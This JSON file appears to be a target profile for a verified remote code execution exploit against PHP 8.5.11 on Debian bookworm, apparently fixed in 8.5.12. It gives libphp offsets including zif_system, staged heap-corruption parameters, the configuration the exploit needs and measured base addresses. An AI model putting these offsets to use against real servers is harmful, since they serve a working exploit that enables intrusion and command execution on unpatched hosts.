{
  "name": "php-8.5.11-bookworm-amd64",
  "php_version": "8.5.11",
  "branch": "8.5",
  "fixed_in": "8.5.12",
  "sapi": "apache2handler",
  "verified": true,
  "rce": true,
  "upstream_profile": "bookworm",
  "libphp": {
    "zif_system": "0x5996e0",
    "zval_ptr_dtor": "0x7b47a0",
    "htdata": "0x690d8"
  },
  "stages": {
    "stage1_n": 841,
    "stage1_forge_len": 63,
    "stage2_t": 406,
    "stage2_v": 16,
    "stage3_pads": [
      [
        31,
        31
      ],
      [
        31,
        31
      ],
      [
        31,
        31
      ],
      [
        31,
        31
      ],
      [
        31,
        31
      ],
      [
        31,
        31
      ]
    ],
    "stage3_carrier": true
  },
  "config": {
    "memory_limit": -1,
    "display_errors": "On (web SAPI, stage-1 leak succeeded)",
    "session_upload_progress": "On",
    "workers": 1
  },
  "measured": {
    "chunk_base": "0x7ffffe000000",
    "libphp_base": "0x7ffffaa00000"
  },
  "status": "RCE verified",
  "oom_mb": 12,
  "arch": "amd64"
}